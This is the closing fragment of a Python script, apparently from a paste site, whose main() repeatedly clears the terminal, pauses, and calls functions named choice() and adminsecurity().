  859.       time.sleep(1.5)
  860.       os.system("clear")
  861.       os.system("clear")
  862.       time.sleep(1.1)
  863.       os.system("clear")
  864.       os.system("clear")
  865.       choice()
  866.  
  867. def main():
  868.  
  869.     os.system("clear")
  870.     os.system("clear")
  871.     os.system("clear")
  872.     time.sleep(1.5)
  873.     os.system("clear")
  874.     os.system("clear")
  875.     os.system("clear")
  876.     adminsecurity()
  877.  
  878. if __name__ == '__main__':
  879.   main()
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement